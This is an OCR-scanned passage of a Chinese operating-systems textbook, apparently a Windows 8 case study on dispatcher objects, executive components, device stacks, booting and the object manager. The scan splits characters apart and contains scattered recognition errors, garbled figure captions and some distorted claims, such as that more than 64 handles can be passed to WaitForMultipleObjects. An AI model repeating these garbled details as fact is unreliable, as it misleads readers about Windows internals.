含 一 个 称 为 dispatcher_header 的 数据 结构 ， 如 图 11-13 所 示 。 它 们 包括 信号 器 、 互 斥 体 、 事 件 、 可 等 待 
定时 器 和 其 他 一 些 可 以 等 待 其 他 线程 同步 执行 的 对 象 。 它 们 还 包括 表示 打开 的 文件 的 对 象 、 进 程 、 线 程 
和 IPC 端 口 的 对 象 。 调 度数 据 结构 包含 了 表示 对 象 状态 的 标志 和 等 待 被 标记 的 对 象 的 线程 队列 。 
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图 11-13 执行 体 对 象 中 人 帐 入 的 dispatcher_header 数 据 结构 (分派 器 对 象 ) 


同步 原 语 ， 如 信号 器 ， 是 标准 的 调度 对 象 。 另 外 定时 器 、 文 件 、 端 口 线程 和 进程 使 用 调度 对 象 机 制 
去 通知 。 当 一 个 定时 器 开启 、 一 个 文件 IO 完成 、 一 个 端口 正在 传输 数据 或 是 一 个 线程 或 进程 终止 时 ， 
相关 的 调度 对 象 会 被 通知 ， 并 唤醒 所 有 等 待 该 事件 的 线程 。 

由 于 Windows 使 用 了 一 个 单一 的 标准 机 制 去 同步 内 核 态 对 象 ， 一 些 专门 的 API 就 无 需 再 等 待 事件 ， 
例如 在 UNIX 中 用 来 等 待 子 进程 的 wait3。 而 通常 情况 下 ， 线 程 要 一 次 等 待 多 个 事件 。 在 UNIX 中 ， 通过 
“select” 系 统 调 用 ， 一 个 进程 可 以 等 待 任何 一 个 64 位 网 络 接口 可 以 获得 的 数据 。 在 Windows 中 亦 有 一 个 
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类 似 的 API WaitForMultipleObjects， 但 是 它 允 许 一 个 线程 等 待 任何 类 型 的 有 句柄 的 调度 对 象 。 超 过 64 
个 句柄 可 以 指定 WaitForMultipleObjects， 以 及 一 个 可 选择 的 超时 值 。 线 程 随时 准备 运行 任何 一 个 和 句柄 
标记 相关 的 事件 或 发 生 超时 。 

内 核 使 用 两 个 不 同 的 程序 使 得 线程 等 待 调度 对 象 运行 。 发 出 一 个 通知 对 象 信号 使 每 一 个 等 待 的 线程 
可 以 运行 。 同 步 对 象 仅 使 第 一 个 等 待 的 线程 可 以 运行 ， 用 于 调度 对 象 ， 实 施 锁 元 ， 如 互 斥 体 。 当 一 个 线 
程 等 待 一 个 锁 再 次 开始 运行 ， 它 做 的 第 一 件 事 就 是 再 次 尝试 请 求 锁 。 如 果 一 次 仅 有 一 个 线程 可 以 保留 锁 ， 
其 他 所 有 可 运行 的 线程 可 能 立刻 被 阻塞 ， 从 而 产生 许多 不 必要 的 现场 交换 。 使 用 同步 机 制 和 使 用 通知 机 
制 的 分 派对 象 (dispatcher object) 之 间 的 差别 是 dispatcher_header 结 构 中 的 一 个 标记 。 

另外 ， 在 Windows 代 码 中 互 斥 体 称 为 “ 变 体 ”(mutant)。 因 为 当 一 个 线程 保留 一 个 出 口 时 ， 它 们 需 
要 执行 OS/2 语 义 中 的 非 自 动 解锁 ， 看 来 这 是 Cutler 奇 特 的 考虑 。 

6. 执行 体 

如 图 11-11 所 示 ， 在 NTOS 的 内 核 层 以 下 是 执行 体 。 执 行 体 是 用 C 语 言 编写 的 ， 在 结构 上 最 为 独立 
(内 存 管理 是 一 个 明显 的 例外 )， 并 且 经 过 少量 的 修改 已 经 移植 到 新 的 处 理 器 上 (MIPS, x86, PowerPC, 
Alpha、IA64 和 x64)。 执 行 体 包括 许多 不 同 的 组 件 ， 所 有 的 组 件 都 通过 内 核 层 提供 的 抽象 控制 器 来 运行 。 

每 个 组 件 分 为 内 部 和 外 部 的 数据 结构 和 接口 。 每 个 组 件 的 内 部 方法 是 隐藏 的 ， 只 有 组 件 自己 可 以 调 
用 ， 而 外 部 方法 可 以 由 执行 体 的 所 有 其 他 组 件 调 用 。 外 部 接口 的 一 个 子 集 由 一 个 ntoskrnl.exe 提 供 ， 而 且 
设备 驱动 可 以 链接 到 它们 ， 就 好 像 执 行 体 是 一 个 库 。 微 软 称许 多 执行 体 组 件 为 “管理 器 ”"， 因 为 每 一 个 
组 件 管理 操作 系统 的 一 部 分 ， 例 如 IO、 内 存 、 进 程 、 对 象 等 。 

对 于 大 多 数 操作 系统 而 言 ， 许 多 功能 在 Windows 上 执行 就 像 库 的 代码 。 除 非 在 内 核 方式 下 运行 ， 它 
的 数据 结构 可 以 被 共享 和 保护 ， 以 避免 用 户 态 下 的 代码 访问 ， 因 此 它 具 有 硬件 状态 的 访问 权限 ， 例 如 
MMU 控 制 寄 存 器 。 但 是 另 一 方面 ， 执 行 体 只 是 代表 它 的 调用 者 简单 执行 操作 系统 的 函数 ， 因 此 它 运行 
在 它 的 调用 者 的 线程 中 。 

当 任何 执行 体 函 数 阻塞 等 待 与 其 他 线程 同步 时 ， 用 户 态 线程 也 会 阻塞 。 这 在 为 一 个 特殊 的 用 户 态 线 
程 工作 时 是 有 意义 的 ， 但 是 在 做 一 些 相 关 的 内 务 处 理 任 务 时 是 不 公平 的 。 当 执行 体 认为 一 些 内 务 处 理 线 
程 是 必需 的 时 候 ， 为 了 避免 劫持 当前 的 线程 ， 一 些 内 核 态 线程 就 会 具体 于 特定 的 任务 而 产生 ， 例 如 确保 
更 改 了 的 页 会 被 回 写 到 硬盘 上 。 

对 于 可 预见 的 低频 率 任务 ,会 有 一 个 线程 一 秒 运 行 一 次 而 且 由 一 个 长 的 项 目 单 来 处 理 。 对 于 不 可 预 
见 的 工作 ， 有 一 个 之 前 曾经 提 到 的 高 优先 级 的 辅助 线程 池 ， 通 过 将 队列 请 求 和 发 送 辅助 线程 等 待 的 同步 
事件 信号 ， 可 以 用 来 运行 有 界 任务 。 

对 象 管理 器 管理 在 执行 体 使 用 的 大 部 分 内 核 态 对 象 ， 包 括 进 程 、 线 程 、 文 件 、 信 号 、LIO 设 备 及 驱 
动 、 定 时 器 等 。 就 像 之 前 提 到 的 ， 内 核 态 对 象 仅仅 是 内 核 分 配 和 使 用 的 数据 结构 。 在 Windows 中 ， 内 核 
数据 结构 有 许多 共同 特点 ， 即 它们 在 管理 标准 功能 中 特别 有 用 。 

这 些 功 能 由 对 象 管理 器 提供 ,包括 管理 对 象 的 内 存 分 配 和 释放 , 配额 计算 ， 支 持 通过 句柄 访问 对 象 ， 
为 内 核 态 指针 引用 保留 引用 计数 ， 在 NT 名 字 空 间 给 对 象 命 名 ， 为 管理 每 一 个 对 象 的 生命 周期 提供 可 扩 
展 的 机 制 。 需 要 这 些 功 能 的 内 核 数 据 结构 是 由 对 象 管理 器 来 管理 的 。 

对 象 管理 器 的 每 一 个 对 象 都 有 一 个 类 型 用 来 详细 指定 这 种 类 型 的 对 象 的 生命 周期 怎样 被 管理 。 这 些 
不 是 面向 对 象 意义 中 的 类 型 ， 而 仅仅 是 当 对 象 类 型 产生 时 的 一 个 指定 参数 集合 。 为 了 产生 一 个 新 的 类 型 ， 
一 个 操作 元 件 只 需要 调用 一 个 对 象 管理 器 API 即 可 。 对 象 在 Windows 的 函数 中 很 重要 ， 在 下 面 的 章节 中 

会 讨论 有 关 对 象 管理 器 的 更 多 细节 。 

VO 管理 器 为 实现 I/O 设 备 驱动 提供 了 一 个 框架 ， 同 时 还 为 设备 上 的 配置 、 访 问 和 完成 操作 提供 一 些 
特定 的 运行 服务 。 在 Windows 中 ， 设 备 驱 动 器 不 仅仅 管理 硬件 设备 ， 它 们 还 为 操作 系统 提供 可 扩展 性 。 
在 其 他 类 型 的 操作 系统 中 被 编译 进 内 核 的 功能 是 被 Windows 内 核 动态 装载 和 链接 的 ， 包 括 网 络 协议 栈 和 
文件 系统 。 

最 新 的 Windows 版 本 对 在 用 户 态 上 运行 设备 驱动 程序 有 更 多 的 支持 ， 这 对 新 的 设备 驱动 程序 是 首选 
的 模式 。Windows 有 超过 100 万 不 同 的 设备 驱动 程序 ， 工 作 着 超过 了 100 万 不 同 的 设备 。 这 就 意味 着 要 获 
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取 正 确 的 代码 。 漏 洞 导致 设备 在 用 户 态 的 进程 中 崩溃 而 不 能 使 用 ， 这 上 比 造 成 对 系统 进行 检测 错误 要 好 得 
多 。 错 误 的 内 核 态 设备 驱动 是 导致 Windows 可 怕 的 BSOD (蓝屏 死机 ) 的 主要 来 源 ， 它 是 Windows 侦 测 到 
致命 的 内 核 态 错误 并 关机 或 重新 启动 系统 。 蓝 屏 死机 可 以 类 比 于 UNIX 系 统 中 的 内 核 恐 慌 。 

在 本 质 上 ， 微 软 现在 已 经 正式 承认 那些 在 microkernels 研 究 领 域 的 如 MINIX 3 和 L4 的 研究 员 多 年 来 
都 知道 的 结果 : 在 内 核 中 有 更 多 的 代码 ， 那 么 内 核 中 就 有 更 多 缺陷 。 由 于 设备 驱动 程序 占 了 70% 的 内 核 
代码 ， 更 多 的 驱动 程序 可 以 进入 用 户 态 进程 ， 其 中 一 个 bug 只 会 触发 一 个 单一 驱动 器 的 失败 (而 不 是 降 
低 整 个 系统 ) 。 从 内 核 到 用 户 态 进程 的 代码 移动 趋势 将 在 未 来 几 年 加 速 发 展 。 

IO 管理 器 还 包括 即 插 即 用 和 电源 管理 设施 。 当 新 设备 在 系统 中 被 检测 到 ， 即 插 即 用 就 开始 工作 。 该 
即 插 即 用 设备 的 子 模块 首先 被 通知 。 它 与 服务 一 起 工作 ， 即 用 户 态 即 插 即 用 管理 器 ， 找 到 适当 的 设备 驱动 
程序 并 加 载 到 系统 中 。 找 到 合适 的 设备 驱动 程序 并 不 总 是 很 容易 ， 有 时 取决 于 先进 的 匹配 具体 软件 设备 特 
定 版 本 的 驱动 程序 。 有 时 一 个 单一 的 设备 支持 一 个 由 不 同 公司 开发 的 多 个 驱动 程序 所 支持 的 标准 接口 。 

我 们 会 在 11.7 节 对 IO 做 进一步 研究 ， 在 11.8 节 中 介绍 最 重要 的 NT 文件 系统 NTFS 。 

电源 管理 能 降低 能 源 消耗 ， 延 长 笔记 本 电脑 电池 寿命 ， 保 存 台 式 电脑 和 服务 器 能 量 。 正 确 使 用 电源 
管理 是 具有 挑战 性 的 ， 因 为 在 把 设备 和 buses 连 接 到 CPU 和 内 存 时 有 许多 微妙 的 依赖 性 。 电 力 消耗 不 只 是 
由 设备 供电 时 的 影响 ， 而 且 还 由 CPU 的 时 钟 频率 影响 ， 这 也 是 电源 管理 在 控制 。 我 们 会 在 11.9 节 中 详细 
学 习 有 关 电 源 管理 的 知识 。 

进程 管理 器 管理 着 进程 和 线程 的 创建 和 终止 ， 包 括 建立 规则 和 参数 指导 它们 。 但 是 线程 运行 方面 由 
内 核 层 决定 ， 它 控制 着 线程 的 调度 和 同步 ， 以 及 它们 之 间 相 互 控制 的 对 象 ， 如 APC。 进 程 包含 线程 、 地 
址 空间 和 一 个 可 以 用 来 处 理 进程 指定 内 核 态 对 象 的 句柄 表 。 进 程 还 具有 调度 器 进行 地 址 空间 交换 和 管理 
进程 中 的 具体 硬件 信息 〈 如 段 描述 符 ) 所 需要 的 信息 。 我 们 将 在 11.4 节 研究 进程 和 线程 的 管理 。 

执行 内 存 管理 器 实现 了 虚拟 内 存 架构 的 需求 分 页 。 它 负责 管理 虚拟 页 映射 到 物理 页 帧 ， 管 理 现 有 的 
物理 帧 ， 和 使 用 备份 管理 磁盘 上 页 面 文件 ， 这 些 页 面 文件 是 用 来 备份 那些 不 再 需要 加 载 到 内 存 中 的 虚拟 
页 的 私有 实例 。 该 内 存 管 理 器 还 为 大 型 服务 器 应 用 程序 提供 了 特殊 功能 ， 如 数据 库 和 编程 语言 运行 时 的 
组 件 ， 如 垃圾 回收 器 。 我 们 将 在 11.5 节 中 研究 内 存 管 理 。 

高 速 缓存 管理 器 优化 IO 的 性 能 ， 文 件 系 统 内 核 虚拟 地 址 空间 保持 一 个 高 速 缓存 的 文件 系统 页 。 高 
速 缓存 管理 器 使 用 虚拟 的 地 址 进行 缓存 ， 也 就 是 说 ， 按 照 它们 文件 所 在 位 置 来 组 织 缓存 页 。 这 不 同 于 物 
理 块 高 速 缓存 ， 例 如 在 UNIX 中 ， 系 统 为 原始 磁盘 卷 保持 一 个 物理 地 址 块 的 内 存 。 

高 速 缓存 的 管理 是 使 用 内 存 映射 文件 来 实现 的 。 实 际 的 缓存 是 由 内 存 管 理 器 完成 。 高 速 缓存 管理 器 
需要 关心 的 只 是 文件 的 哪些 部 分 需要 高 速 缓存 ， 以 确保 缓存 的 数据 即时 地 刷新 到 磁盘 中 ， 并 管理 内 核 虚 
拟 地 址 映射 缓存 文件 页 。 如 果 一 个 页 所 需 的 IO 文件 在 缓存 中 没有 ， 该 页 在 使 用 高 速 缓存 管理 器 时 将 会 
发 生 错 误 。 我 们 会 在 11.6 节 中 介绍 高 速 缓存 管理 器 。 

安全 引用 监视 器 (security reference monitor) 执行 Windows 详 细 的 安全 机 制 ， 以 支持 计算 机 安全 要 
求 的 国际 标准 的 通用 标准 (Common Criteria) ， 一 个 由 美国 国防 部 的 橘 皮 书 的 安全 要 求 发 展 而 来 的 标准 。 
这 些 标准 规定 了 一 个 符合 要 求 的 系统 必须 满足 的 大 量规 则 ， 如 登录 验证 、 审 核 、 零 分 配 的 内 存 等 更 多 的 
规则 。 一 个 规则 要 求 ， 所 有 进入 检查 都 由 系统 中 的 一 个 模块 进行 检查 。 在 Windows 中 此 模块 就 是 内 核 中 
的 安全 监视 器 。 我 们 将 在 11.9 节 中 更 详细 地 学 习 安 全 系统 。 

执行 体 中 包括 其 他 一 些 组 件 ， 我 们 将 简要 介绍 。 如 前 所 述 ， 配 置 管理 器 实现 注册 表 的 执行 体 组 件 。 注 
册 表 中 包含 系统 配置 数据 的 文件 的 系统 文件 称 为 储 集 (hive)。 最 关键 的 储 梨 是 系统 启动 时 加 载 到 内 存 的 系 
统 储 梨 。 只 有 在 执行 体 成 功 地 初始 化 其 主要 组 件 ， 包 括 了 系统 磁盘 的 MO 驱动 程序 ， 之 后 才 是 文件 系统 中 储 
巢 关 联 的 内 存 中 的 储 梨 副本 。 因 此 ， 如 果 试 图 启动 系统 时 发 生 不 测 ， 磁 盘 上 的 副本 是 不 太 可 能 被 损坏 的 。 

LPC 的 组 成 部 分 提供 了 运行 在 同一 系统 的 进程 之 间 的 高 效 内 部 通信 。 这 是 一 个 基于 标准 的 远程 过 程 
调用 (RPC) 的 功能 ， 用 来 实现 客户 机 /服务 器 的 处 理 方式 的 数据 传输 。RPC 还 使 用 命名 管道 和 TCP/IP 作 
为 传输 通道 。 

在 Windows 中 LPC (现在 称 为 ALPC 或 高 级 LPC) 大 大 加 强 了 对 RPC 新 功能 的 支持 ， 包 括 来 自 内 核 态 
组 件 的 RPC， 如 驱动 。LPC 是 NT 原始 设计 中 的 一 个 重要 的 组 成 部 分 ， 因 为 它 被 子 系统 层 使 用 ， 实 现 运行 在 
每 个 进程 和 子 系统 进程 上 库存 例 程 的 通信 ， 这 实现 了 一 个 特定 操作 系统 的 个 性 化 功能 ， 如 Win32 或 POSIX。 


实例 研究 2: Windows 8 505 


Windows 8 中 实现 了 一 种 称 作 WNF (Windows 消 息 中 心 ) 的 发 布 /订阅 模式 的 服务 。WNF 的 消息 运 
作 机 制 是 基于 WNF 状 态 数据 的 更 改 。 一 个 发 布 者 声明 了 一 个 状态 数据 (最 多 4KB) 的 实例 ， 并 且 告 诉 操 
作 系 统 需 要 维护 该 数据 多 久 ( 例 如， 直到 下 一 次 重启 或 永久 )。 发 布 者 会 自动 事 无 巨细 地 更 新 这 些 状态 
数据 。 当 状态 数据 被 发 布 者 修改 的 时 候 ， 订 阅 者 可 以 运行 之 前 安排 好 的 代码 。 因 为 WNF 状 态 实例 包含 一 
定量 确定 的 预 分 配 的 数据 ， 所 以 该 模式 不 存在 其 他 继续 消息 的 进程 间 通 信 方 式 出 现 的 资源 管理 问题 。 订 
阅 者 被 保证 只 能 看 见 最 新 的 状态 数据 。 

这 一 种 基于 状态 的 方法 使 得 WNF 相 对 于 其 他 的 进程 间 通 信 方 式 有 了 很 大 的 优势 :发布 者 和 订阅 者 
相互 之 间 进行 了 解 耦 合 ， 它 们 可 以 独立 地 开启 和 关闭 。 发 布 者 不 需要 在 启动 时 就 运行 ， 而 是 只 需要 初始 
化 它 对 应 的 状态 数据 ， 且 这 些 数 据 可 以 在 操作 系统 重启 的 时 候 被 保存 下 来 。 订 阅 者 在 开始 运行 时 并 不 需 
要 了 解 其 对 应 数据 的 历史 值 ， 取 而 代 之 是 当下 的 状态 (其 包含 了 一 些 历史 信息 ) 。 在 一 个 历史 状态 无 法 
被 详细 概括 的 情况 下 ， 当 下 的 状态 会 提供 一 些 原始 数据 以 用 于 管理 历史 状态 。 例 如 ， 放 在 一 个 文件 或 对 
象 文件 用 于 循环 的 持久 缓冲 区 。WNF 是 原始 NT API 的 一 部 分 ， 并 且 目 前 还 设 暴露 在 Win32 接口 之 中 。 
但 是 它 在 系统 内 部 被 广泛 用 于 实现 Win32 和 WinRT API, 

Windows NT 4.0 中 的 许多 代码 与 Win32 进 入 内 核 的 图 形 界面 相关 ， 因 为 当时 的 硬件 无 法 提供 所 需 的 
性 能 。 该 代码 以 前 位 于 csrss.exe 子 系统 进程 ， 执 行 Win32 接 口 。 以 内 核 为 基础 的 图 形 用 户 界面 的 代码 位 
于 一 个 专门 的 内 核 驱 动 win32k.sys 中 。 这 一 变化 预计 将 提高 Win32 的 性 能 ， 因 为 额外 的 用 户 态 /内 核 态 的 
转换 和 转换 地 址 空间 的 成 本 经 由 LPC 执 行 通信 是 被 清除 的 。 但 并 没 能 像 预 期 的 那样 取得 成 功 ， 因 为 运行 
在 内 核 中 的 代码 要 求 是 非常 严格 的 ， 运 行 在 内 核 态 上 的 额外 消耗 抵消 了 因 减 少 交换 成 本 获得 的 收益 。 

7. 设备 驱动 程序 

11-11 的 最 后 一 部 分 是 设备 驱动 程序 的 组 成 。 在 Windows 中 的 设备 驱动 程序 的 动态 链接 库 是 由 NTOS 
装载 。 虽 然 它们 主要 是 用 来 执行 特定 硬件 的 驱动 程序 ， 如 物理 设备 和 IO 总 线 ， 设 备 驱动 程序 的 机 制 也 可 
作为 内 核 态 的 一 般 可 扩展 性 的 机 制 。 如 上 所 述 ， 大 部 分 的 Win32 子 系统 是 作为 一 个 驱动 程序 被 加 载 。 

IO 管理 器 组 织 的 数据 按照 一 定 的 路 线 流 经 过 每 个 设备 实例 ， 如 图 11-14 所 示 。 这 个 路 线 称 为 设备 栈 ， 由 
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设备 栈 由 设备 对 象 ” 每 一 个 设备 对 象 都 链接 着 ”设备 栈 由 设备 对 象 组 成 ， 
组 成 ， 比 如 C: 带 有 入 口 点 的 驱动 对 象 比如 D: 


图 11-14 简单 描绘 两 个 NTFS 文 件 卷 的 设备 栈 。1/O 请 求 包 由 上 往 下 通过 栈 。 每 一 级 堆栈 中 的 相关 驱动 中 的 
适当 程序 被 调用 。 该 设备 栈 由 分 配给 每 个 堆栈 的 设备 对 象 组 成 
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分 配 到 这 条 路 线 上 的 内 核 设 备 对 象 的 私有 实例 组 成 。 设 备 堆栈 中 的 每 个 设备 对 象 与 特定 的 驱动 程序 对 象 
相关 联 ， 其 中 包含 日 常 使 用 的 IO 请 求 的 数据 包 流 经 该 设备 堆栈 的 表 。 在 某 些 情况 下 ， 堆 栈 中 的 设备 驱 
动 程序 唯一 的 目的 是 针对 某 一 特定 的 设备 、 总 线 或 网 络 驱 动 程序 过 滤 I/O 操 作 。 过 滤器 的 使 用 是 有 一 些 
原因 的 。 有 时 预 处 理 或 后 处 理 IO 操 作 可 以 得 到 更 清晰 的 架构 ， 而 其 他 时 候 只 是 以 实用 为 出 发 点 ， 因 为 
没有 修改 驱动 的 来 源 和 权限 ， 过 滤器 是 用 来 解决 这 个 问题 的 。 过 滤器 还 可 以 全 面 执行 新 的 功能 ， 如 把 磁 
盘 分 区 或 多 个 磁盘 分 成 RAID 卷 。 

文件 系统 作为 驱动 程序 被 加 载 。 每 个 文件 系统 卷 的 实例 ， 都 有 一 个 设备 对 象 创建 ， 并 作为 该 设备 堆 
栈 卷 的 一 部 分 。 这 个 设备 对 象 将 与 驱动 对 象 的 文件 系统 适当 的 卷 格式 发 生 关联 。 特 殊 的 过 滤器 驱动 程序 ， 
称 为 文件 系统 过 滤器 驱动 程序 ， 可 以 在 文件 系统 设备 对 象 之 前 插入 设备 对 象 ， 以 将 功能 应 用 于 被 发 送 到 
每 个 卷 的 IO 请 求 ， 如 数据 读 取 或 写 人 的 病毒 检查 。 

网 络 协议 也 作为 使 用 IO 模型 的 驱动 被 装载 起 来 ， 例 如 Windows 整 合 的 IPv4/IPv6 TCP/IP 实 现 。 对 于 
老 的 基于 MS-DOS 的 Windows 操 作 系 统 ，TCP/IP 驱 动 实现 了 一 个 特殊 的 Windows IO 模型 网 络 接口 上 的 
协议 。 还 有 其 他 一 些 驱动 也 执行 这 样 的 安排 ，Windows 称 之 为 微型 端口 。 共 享 功能 是 在 一 个 类 驱动 程序 
中 。 例 如 ，SCSI、IDE 磁 盘 或 USB 设 备 的 通用 功能 是 作为 类 驱动 提供 的 ， 这 个 类 驱动 为 这 些 设备 的 每 个 
特定 类 型 提供 微型 端口 驱动 程序 ， 并 连接 为 一 个 库 。 

我 们 在 本 章 不 讨论 任何 特定 的 设备 驱动 ， 但 是 在 11 -7 节 中 将 更 为 详细 地 介绍 1O 管 理 器 如 何 与 设备 
驱动 互动 的 相关 内 容 。 

11.3.2 启动 Windows 

使 用 操作 系统 需要 运行 几 个 步骤 。 当 电脑 打开 时 ，CPU 初 始 化 硬件 。 然 后 开始 执行 内 存 中 的 一 个 程 
序 。 但 是 ， 唯 一 可 用 的 代码 是 由 计算 机 制造 商 初始 化 的 某 些 非 易 失 性 的 CMOS 内 存 形式 (有 时 被 用 户 更 
新 ， 在 一 个 进程 中 称 为 闪存 )。 因 为 这 个 软件 是 固化 在 内 存 中 的 ， 并 且 很 少 被 更 新 ， 所 以 它 一 般 被 称 为 
固件 。 这 些 固件 被 主板 制造 商 或 操作 系统 制造 商 写 在 了 计算 机 中 。 历 史上 计算 机 的 固件 一 般 被 称 作 
BIOS (基础 输入 输出 系统 )， 但 最 新 的 计算 机 中 采用 了 新 的 UEFI (统一 可 扩展 固件 接口 )。UEFI 改 善 了 
BIOS 的 一 些 问 题 ， 支 持 新 的 硬件 ， 提 供 一 个 独立 于 CPU 架 构 的 模块 化 架构 ， 支 持 一 个 新 的 模块 以 用 于 
网 络 启 动 计算 机 ， 提 供 新 的 计算 机 以 及 运行 检测 程序 。 

任何 一 个 固件 的 目标 都 是 在 计算 机 加 载 操作 系统 之 前 ， 找 到 操作 系统 的 对 应 代码 中 一 段 放 在 特定 位 
置 上 的 程序 。 引 导 程 序 知道 如 何在 根 目 录 的 文件 系统 卷 之 外 阅读 足够 的 信息 去 发 现 独 立 的 Windows 
BootMgr 程 序 。BootMgr 确 定 系统 是 否 已 经 处 于 休 卢 或 待机 模式 (特别 省 电 模 式 ， 系 统 不 需要 重启 就 可 
以 重新 打开 )。 如 果 是 ，BootMgr 加 载 和 执行 WinResume.exe。 否 则 加 载 和 执行 WinLoad.exe 执 行 新 的 启 
动 。WinLoad 加 载 系统 启动 组 件 到 内 存 中 : 内 核 /执行 体 (通常 是 ntoskrnl.exe)、HAL(hal.dll)， 该 文件 包 
含 系统 储 梨 ，Win32k.sys 驱 动 包含 Win32 子 系统 的 内 核 态 部 分 ， 以 及 任何 其 他 在 系统 储 中 中 作为 启动 驱 
动 程序 列 出 的 驱动 程序 的 镜像 ， 这 就 意味 着 在 系统 启动 时 ， 它 们 是 必需 的 。 

一 旦 Windows 启 动 组 件 加 载 到 内 存 中 ， 控 制 就 转移 给 NTOS 中 的 低级 代码 ， 来 完成 初始 化 HAL、 内 
核 和 执行 体 、 链 接 驱动 像 、 访 问 /更 新 系统 配置 中 的 数据 等 操作 。 所 有 内 核 态 的 组 件 初始 化 后 ， 第 一 个 
用 户 态 进程 被 创建 ， 使 用 运行 着 的 smss.exe 程 序 (如 同 UNIX 系 统 中 的 /etc/init)。 

最 近 的 Windows 版 本 提供 了 对 于 提高 系统 启动 时 安全 性 的 支持 。 大 部 分 新 的 个 人 计算 机 的 主板 上 都 
包含 新 的 芯片 TPM (可 信 平 台 模块 )， 该 芯片 是 一 个 用 密码 学 保护 起 来 的 用 于 保存 系统 重要 信息 (例如 
密 匙 ) 的 处 理 器 。 这 些 重要 信息 会 被 BitLocker 之 类 的 的 软件 用 于 加 密 磁盘 信息 。 在 确认 操作 系统 没有 被 
算 改 之 后 ，TPM 才 会 给 操作 系统 受 保护 的 密 匙 。 并 且 该 芯片 还 提供 其 他 的 密码 学 功能 ， 例 如 向 远程 操作 
系统 证 实 本 地 操作 系统 并 未 受到 危及 。 

Windows 启 动 程序 在 遇 到 系统 启动 失败 时 ， 有 专门 处 理 常 用 问题 的 逻辑 。 有 时 安装 一 个 坏 的 设备 驱 
动 程序 ， 或 运行 一 个 像 注册 表 一 样 的 程序 (能 导致 系统 储 巢 损坏 )， 会 阻止 系统 正常 启动 。 系 统 提供 了 
一 种 功能 来 支持 忽略 最 近 的 变化 并 启动 到 最 近 一 次 的 系统 正确 配置 。 其 他 启动 选项 包括 安全 启动 ， 它 关 
闭 了 许多 可 选 的 驱动 程序 。 还 有 故障 恢复 控制 台 ， 启 动 cmd.exe 命 令 行 窗口 ， 它 提供 了 一 个 类 似 UNIX 的 
单 用 户 态 。 
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另 一 个 常见 的 问题 ， 用 户 认为 ,一些 Windows 系 统 偶尔 看 起 来 很 不 可 思议 ,经常 有 系统 和 应 用 程序 
的 (看 似 随机 ) 崩溃 。 从 微软 的 在 线 崩 溃 分 析 程 序 得 到 的 数据 ， 提 供 了 许多 崩溃 是 由 于 物理 内 存 损坏 导 
致 的 证 据 。 所 以 Windows 启 动 进程 提供 了 一 个 运行 广义 上 的 内 存 诊 断 的 选项 。 也 许 未 来 的 PC 硬件 将 普遍 
支持 ECC (或 者 部 分 ) 支持 ECC 内 存 ， 但 是 今天 的 大 多 数 台 式 机 和 笔记 本 电脑 系统 很 容易 受到 攻击 ， 甚 
至 是 在 它们 所 包含 的 数 十 亿 比 特 的 内 存 中 的 单 比特 错误 。 


11.3.3 对象 管理 器 的 实现 

对 象 管理 器 也 许 是 Windows 可 执行 过 程 中 一 个 最 重要 的 组 件 ， 这 也 是 为 什么 我 们 已 经 介绍 了 它 的 许 
多 概念 。 如 前 所 述 ， 它 提供 了 一 个 统一 的 和 一 致 的 接口 ， 用 于 管理 系统 资源 和 数据 结构 ， 如 打开 文件 、 
进程 、 线 程 、 内 存 部 分 、 定 时 器 、 设 备 、 驱 动 程序 和 信号 。 更 为 特殊 的 对 象 可 以 表示 一 些 事物 ， 像 内 核 
的 事务 、 外 形 、 安 全 令 牌 和 由 对 象 管理 器 管理 的 Win32 桌 面 。 设 备 对 象 和 IO 系统 的 描述 联系 在 一 起 ， 包 
括 提供 NT 名 字 空 间 和 文件 系统 卷 之 间 的 链接 。 配 置 管理 器 使 用 一 个 key 类 型 的 对 象 与 注册 配置 相 链 接 。 
对 象 管 理 器 自身 有 一 些 对 象 ， 它 用 于 管理 NT 名 字 空 间 和 使 用 公共 功能 来 实现 对 象 。 在 这 些 目录 中 ， 有 
象征 性 的 联系 和 对 象 类 型 的 对 象 。 

由 对 象 管理 器 提供 的 统一 性 有 不 同 的 方面 。 所 有 这 些 对 象 使 用 相同 的 机 制 ， 包 括 它们 是 如 何 创建 、 
销毁 以 及 定额 分 配 值 的 占有 。 它 们 都 可 以 被 用 户 态 进程 通过 使 用 句柄 访问 。 在 内 核 的 对 象 上 有 一 个 统一 的 
协议 管理 指针 的 引用 。 对 象 可 以 从 NT 的 名 字 空间 (由 对 象 管理 器 管理 ) 中 得 到 名 字 。 调 度 对 象 (那些 以 
信号 事件 相关 的 共同 数据 结构 开始 的 对 象 ) 可 以 使 用 共同 的 同步 和 通知 接口 ， 如 WaitForMultipleObjects。 
有 一 个 共同 的 安全 系统 ， 其 执行 了 以 名 称 来 访问 的 对 象 的 ACL， 并 检查 每 个 使 用 的 句柄 。 甚 至 有 工具 帮 
助 内 核 态 开发 者 ， 在 使 用 对 象 的 过 程 中 追踪 调试 问题 。 

理解 对 象 的 关键 ， 是 要 意识 到 一 个 (执行) 对 象 仅 仅 是 内 核 态 下 在 虚拟 内 存 中 可 以 访问 的 一 个 数据 
结构 。 这 些 数 据 结 构 ， 常 用 来 代表 更 抽象 的 概念 。 例 如 ， 执 行文 件 对 象 会 为 那些 已 打开 的 系统 文件 的 每 
一 个 实例 而 创建 。 进 程 对 象 被 创建 来 代表 每 一 个 进程 。 

一 种 事实 上 的 结果 是 ， 对 象 只 是 内 核 数 据 结构 ， 当 系统 重新 启动 时 (或 崩溃 时 ) 所 有 的 对 象 都 将 丢 
失 。 当 系统 启动 时 ， 没 有 对 象 存在 ， 甚 至 没有 对 象 类 型 描述 。 所 有 对 象 类 型 和 对 象 自身 ， 由 对 象 管理 器 
提供 接口 的 执行 体 的 其 他 组 件 动态 创建 。 当 对 象 被 创建 并 指定 一 个 名 字 ， 它 们 可 以 在 以 后 通过 NT 名 字 
空间 被 引用 。 因 此 ， 建 立 对 象 的 系统 根 目录 还 建立 了 NT 名 字 空 间 。 

对 象 结 构 如 图 11-15 所 示 。 每 个 对 象 包含 一 个 对 所 有 类 型 的 所 有 对 象 的 某 些 共性 信息 头 。 在 信息 头 
中 包括 在 名 字 空 间 内 的 对 象 名 称 、 对 象 目录 ， 并 指向 安全 描述 符 代表 的 ACL 对 象 。 


Close 方 法 
Delete 方 法 
Query name 方 法 
Parse 方 法 
Security 方 法 








图 11-15 对 象 管理 器 管理 的 执行 体 对 象 的 结构 


对 象 的 内 存 分 配 来 自由 执行 体 保持 的 两 个 堆 (或 池 ) 的 内 存 之 一 。 在 有 CRATES Be) 效用 函数 的 执 
